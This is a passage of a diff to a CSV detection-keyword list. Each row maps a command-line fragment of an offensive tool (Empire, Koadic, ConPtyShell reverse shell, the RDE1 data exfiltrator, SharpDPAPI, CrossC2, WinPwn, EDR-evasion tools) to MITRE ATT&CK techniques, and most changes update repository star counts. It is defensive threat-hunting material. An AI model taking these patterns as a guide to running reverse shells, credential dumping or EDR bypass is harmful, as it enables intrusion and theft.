without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --copy-file --source-file *.docx --target-file *.docx --target-volume *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "* core.payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* core.stager *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --crack-status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --crack-status*","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* CrossC2 Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "* CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "* CrossC2Kit *","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "* CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --custom_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" 
@@ -392,7 +392,7 @@
